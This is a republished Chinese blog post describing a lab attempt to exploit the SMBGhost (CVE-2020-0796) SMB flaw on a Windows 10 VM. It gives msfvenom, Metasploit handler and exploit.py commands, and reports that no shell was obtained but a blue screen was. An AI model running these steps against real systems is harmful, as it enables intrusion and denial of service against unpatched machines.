ICode9

精准搜索请尝试: 精确搜索
首页 > 系统相关> 文章详细

WIN10永恒之黑CVE-2020-0796漏洞复现获取getshell(未成功)可蓝屏

2021-02-03 14:30:56  阅读:63  来源: 互联网

标签:getshell ip multi tcp exploit handler 2020 0796 msf6


exploit:https://codechina.csdn.net/mirrors/chompie1337/SMBGhost_RCE_PoC?utm_source=csdn_github_accelerator

目标主机

把防火墙关了

 

关闭后可以ping通之后

连接反向木马

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python

看到buf=。。。。这些编码全部复制下来

双击打开我们下载好的exploit.py

往下拉找到以USER_PAYLOAD开头的编码,将我们刚刚复制的替换上去

然后把全部buf改为USER_PAYLOAD,替换完后保存

启动美少妇(msfconsole)

payload:

msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6

exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp

payload => windows/x64/meterpreter/bind_tcp msf6

exploit(multi/handler) > set loprt 4444

loprt => 4444

msf6 exploit(multi/handler) > set rhost 目标ip地址

rhost => 192.168.xx.132 msf6 exploit(multi/handler) > options

run之后等待连接,这时候我们重新开个终端运行我们刚刚修改过的exploit.py

正常情况下输入:python3 exploit.py -ip 目标ip地址

就会获取getshell

还可以蓝屏按道理我这个镜像的这个编号漏洞没打补丁才是,但是一直报physical read primitive failed!我也不知道咋搞,就到这吧,虽然没拿到getshell,后面有空再安装个win10 1903的版本,我这个是1909 x64的

python exploit.py -ip 目标ip地址

用python2运行直接蓝屏

标签:getshell,ip,multi,tcp,exploit,handler,2020,0796,msf6
来源: https://blog.csdn.net/qq_35258210/article/details/113602620

专注分享技术,共同学习,共同进步。侵权联系[admin#icode9.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有